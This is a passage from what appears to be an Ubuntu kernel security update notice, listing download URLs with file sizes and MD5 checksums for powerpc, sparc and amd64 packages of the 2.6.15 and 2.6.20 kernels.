http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:  1923634 2ad21fe5b3130be19104739d8c21af45
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:  2436304 fe1b77572b869ff3581ce308a08328e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-powerpc-smp_2.6.15-52.67_powerpc.deb
  Size/MD5:   871692 b53dc4f8bfb05db45bc2b7159bcec9e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-powerpc64-smp_2.6.15-52.67_powerpc.deb
  Size/MD5:   871228 fd1ff1169304220802a98cabdc359372
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-powerpc_2.6.15-52.67_powerpc.deb
  Size/MD5:   866352 dfb1f043c87f244459bc0af06126ffa5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_powerpc.deb
  Size/MD5:  6943480 1258b9362939477454f7261a4c13d890
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-powerpc-smp_2.6.15-52.67_powerpc.deb
  Size/MD5: 22774270 3bfefe03a694939bae93a233b64d1f6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-powerpc64-smp_2.6.15-52.67_powerpc.deb
  Size/MD5: 23664326 5b31b6d396b849636292e7043a4611a6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-powerpc_2.6.15-52.67_powerpc.deb
  Size/MD5: 22348144 5213ef717d34a6d8bb4f506f0fec3b26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    17780 b0e265505fb1bd0453d03edb2cb5426f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    17372 cdd2956b96258f82dbb8f668b464e37c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   261264 1975724b533e96481dd6906fc384a0ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   282496 f62273e6089393c90ea51b6f95218280
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   227454 dbc3fe1f8d75dd2973446141b925ce2a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   248664 64c26003076ca1201d79313688cc7039
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:  1048458 ffc37e2c7ed2f294a02c250e689b54a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:  1048580 22a6b57fc17ec95380e8f2f4d72b0af6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:  1737720 462902297ae37f6e081d6b48e45de15a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:  1877414 5c369eb9af92233f54092b7cf2825507
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   250930 faac4c4f3b46c3ec3b6bc8e04d800748
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   233674 594d3e744920b4e6cd776b7f20515d49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    13032 c01ba80cd1249d8af8819276f46d1c5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    13522 7693bec428e9a07f30070db7df241e89
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    84832 4b8ed4a1b5096797af1c01f42cf1312a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    52186 c9f8e4dbc56681db68d0b1b182c00fbc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    73924 03a0e9b0752b8b8580b9952cd2fba4f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    85838 34bc729811018bd09664fcfeb9d03db6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:     6614 9fd2a1d6903afe55930f6669a04cd114
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:     7062 e56de4812f4da9b9e1c4741fb5066fdf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    60358 df0a203e8212f473557900df240a9d50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    70346 c242bb51750263d67282f2bfcab2ac3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   128538 117433fce2532d394c1b474367c71e6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   157788 d7e5c445c7af7f110588c2bc9f0fb29b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   108036 2815ba8053c87b229ac39933295e2f11
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   126056 7e632cf1ae8fe20130ec287c454dcabf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    87298 60c6c5d3144579569de99ff84450790f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    93304 1951df808f7bc6ae0c36c17bf9fe4b10
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:  2013954 7d06ed44aa7beb09a1eb08efb541025f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:  1988040 32ec754026d6f8f6ab81dcfaef222b82
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   104106 9af2db11a4ff42e09bab375304b42bbc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   115698 8849c21b901df3bd1a8c920ea7a1324e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    12734 41664c2c832d96647ee317ff21cb782f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    14432 896df8d28f56e236b1a520140829d353
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    39948 108a2f64b5b0b0d4faa9c40c76281a1e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    41464 5f919e671b76f55b57c9d5e0ef79f18e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   149316 ffbd1581cbd0e311836a81dd758ee03a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   168082 74195d6b16d3f930bb8a6a4c10340463
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    42262 925d969199a9002cd81156d4cc3b899f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    44862 1582101a87737c696a538ed0d92fe264
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   320286 ca366a6cd2422bba2ce24e6a8935b4da
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   324716 ee0f3870540ef254de0d9378c66397e3
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-powerpc-smp_2.6.15.12-52.3_powerpc.deb
  Size/MD5:  1340274 d3c1ea04d4a5f99b3de867f55e0159b1
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-powerpc_2.6.15.12-52.3_powerpc.deb
  Size/MD5:  1335414 6f90faf30c0f0f8dabacd51929cfd0cf
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-52-powerpc-di_2.6.15.12-52.3_powerpc.udeb
  Size/MD5:   798764 4071886c6215c22e4496ab9b8cdfd0e2
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-52-powerpc-di_2.6.15.12-52.3_powerpc.udeb
  Size/MD5:   508404 77282618d7de69192b3454dc6a755413

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-sparc64-smp_2.6.15-52.10_sparc.deb
  Size/MD5:   186944 deac3ddc394261c31894b2b350b491d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-sparc64_2.6.15-52.10_sparc.deb
  Size/MD5:   185516 b815ad36987028ff6dcf8e0889e48ae3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-sparc64-di_2.6.15-52.10_sparc.udeb
  Size/MD5:   100670 eb4ab70462b50bcf7e614b4b03b88760
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-sparc64-di_2.6.15-52.10_sparc.udeb
  Size/MD5:   105832 23739442c690623b0070062ee0ab255a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    50464 2b4cbadad1f1a9b25d98994fd2ef9ad3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:     2352 177ea4a5a957fc0af1009f43f5675c47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    40322 ff3a3117839dd36e8b625ef60863e52a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:   110518 e1aa12134ab3fa21bda1a1b87af00703
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    41170 5176277d9c10e5a6714353953d08db38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:   104232 5db5dfeaa4b8550bd7eececbd765e104
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:     7432 f7d3b9cb1c8b1a80e8570a8f6a24ef29
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:   149016 4099cb20f575606ad7bcad3ec54e5916
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:  1707920 68bbd4cda5113476731a2b74cb51dce9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-sparc64-smp_2.6.15-52.67_sparc.deb
  Size/MD5:   768974 08ae76621d41766c99741d3c2fe36109
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-sparc64_2.6.15-52.67_sparc.deb
  Size/MD5:   764708 14b683cf3884a8117ad68198ea996861
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_sparc.deb
  Size/MD5:  6958650 b471540d77edfdf4d81a6168ed3d1910
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-sparc64-smp_2.6.15-52.67_sparc.deb
  Size/MD5: 15003738 10899c77cec105edf1f8a9fbe29b9244
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-sparc64_2.6.15-52.67_sparc.deb
  Size/MD5: 14821832 a451316e0b171f1cacad49e94638e03d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:     7420 77f554ffc62be87d34ca5b82dc2ac6f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:   248676 31f51fe66bf5f1eea3555ceae5be642c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:   212258 bdbd80ea31dd1eda1b2dcf3f4b321706
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:  1048456 c9fb8123dfe5103239b40e775e21ee57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:  1481828 e82ed81cf6cd3bf54fea8055e5c28043
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    10118 67cd4cc9006195c5d51a36b931daafd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    40178 562aa33225baf0ec83caafdfe73423e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:     9360 aa8331b3eaa227b21172bef6a2cc6d99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    61434 ca7a64fe2897c1fd0222d296b2f80ac8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:   163010 85b771d6fdc6b1169d5ab763ae942e0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    63986 4f889a61f86c3d809e47bce1b48b4aee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:  1235084 542ba4933f965846516690eea419dec8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    59350 8342814c277e3041b900a770bb45b59f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:    37396 844833e2c84f080810e27fa65e7caba0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb
  Size/MD5:   280070 bc70d76611118d743bd7a3e4895e373b
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-sparc64-smp_2.6.15.12-52.3_sparc.deb
  Size/MD5:   828134 ff32a8aa76a07003aae33dc835fae59f
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-sparc64_2.6.15.12-52.3_sparc.deb
  Size/MD5:   828052 81fa3eb580ecc71da7da9e6e9a34775a

Updated packages for Ubuntu 7.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20_2.6.20-17.12.dsc
  Size/MD5:     1830 ee053f39bcc59b701002b82a2f1142b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20_2.6.20-17.12.tar.gz
  Size/MD5:   214716 a4ba6d17d1ca9fc3919d6a93c3b93006
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-17.36.diff.gz
  Size/MD5:  1605830 f97c70596b4a1c07a42a1f7459c5470b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-17.36.dsc
  Size/MD5:     2472 6f8fb4f7127a66e87321c19a4853f91b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz
  Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20_2.6.20.6-17.31.diff.gz
  Size/MD5:   107789 78e768b26348b89c3990418e43ac1a82
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20_2.6.20.6-17.31.dsc
  Size/MD5:     2683 db1ca1e3fe165edb5686d5c72e5cecab
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20_2.6.20.6.orig.tar.gz
  Size/MD5: 139814900 ab2c852e27c86d11d0156920ca5f8d56

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-17.36_all.deb
  Size/MD5:  4878228 eb8bdcbfc83b2bb63fd8b89fdbddcc1e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-17.36_all.deb
  Size/MD5:    86074 51908b87928f5c45caa9e653cd23621e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-17.36_all.deb
  Size/MD5: 47829976 380a8bbde35a67a38600479e12ced4f5
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-common_2.6.20.6-17.31_all.deb
  Size/MD5:    21782 cb5f5829ce6104fbb47192ee619c3865

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-generic_2.6.20-17.12_amd64.deb
  Size/MD5:    84016 046b408466c3ad9cb2963634c15fcaf7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-server_2.6.20-17.12_amd64.deb
  Size/MD5:    83900 c077d33308773f0d98c7270f631148ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-generic-di_2.6.20-17.12_amd64.udeb
  Size/MD5:    84310 e0063a1e0ac8cd869577ff79e34f0498
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    24498 83d220d8424f7f5dd858a804198d9505
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   202082 4c0872eb2c550fe8de39973db0d98e8e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    39354 2591f7379f4e296433ed8bfead9e2b95
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    50908 928fd03a9ccc2edeb8504d4dd9e47633
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   187506 f6bf3e342f0263535c9ca41f410a8fa9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    34910 dcc7af80943547b0f75299ee5dee5d37
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   644402 d695410618b99ae784fbee8fe1c72345
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   174670 177a305dfc124bb636fd2d5acc663af9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    76422 080143b9afe7d15f3e59095535394ce7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    57888 fc2d61caa7ed5d30e101a102989bc51e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   140010 c608eb9689d31f285c8fc2e2b92d4858
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   277468 35d83db663c60bf2171279255ca65145
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:  1904118 1c3f6df9f72926afe461cca5b6926aaf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-generic_2.6.20-17.36_amd64.deb
  Size/MD5:   857786 3a3284f60874c75d4641b22cc1034fbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-lowlatency_2.6.20-17.36_amd64.deb
  Size/MD5:   857068 8f055119b227038a319b0d1bc6298001
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-server_2.6.20-17.36_amd64.deb
  Size/MD5:   856470 cded6b39e168be3a267c377744242113
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_amd64.deb
  Size/MD5:  8130814 e225cd619d90a28cd2a06448e94fbac1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-generic_2.6.20-17.36_amd64.deb
  Size/MD5: 23065906 0bb094b3e3e33dd870d11a24264bebec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-server_2.6.20-17.36_amd64.deb
  Size/MD5: 23388296 6e4364f4c3e0c83b9227333a63273efb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-generic_2.6.20-17.36_amd64.deb
  Size/MD5: 18428992 bfb0e2d482378ce4fd82314938976d14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-server_2.6.20-17.36_amd64.deb
  Size/MD5: 18702670 84607703fab1742f0cc794012047413e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_amd64.deb
  Size/MD5:   669118 d9c3d7bfb62b823d98b17c0b5808747e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   246430 e1adefaf889dd8b6f7d893cf9ba6e72a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   144482 79e0151386812271e8842e22e1e53e85
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   225134 4fd97d2c39caa88726f4c8f3e69c3af0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:  1110528 4a3d2217a7cc1f0ab1d5c871d380e0fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:  1754794 dd8aa6f7e4887a33835894b72b830f57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   140910 716411a33647dacbb9d6f36987616414
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   163384 a9453d5d98d01dacb394f08b974bc5e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   265716 e9d69ef9af3e1b382ed7a93447d54246
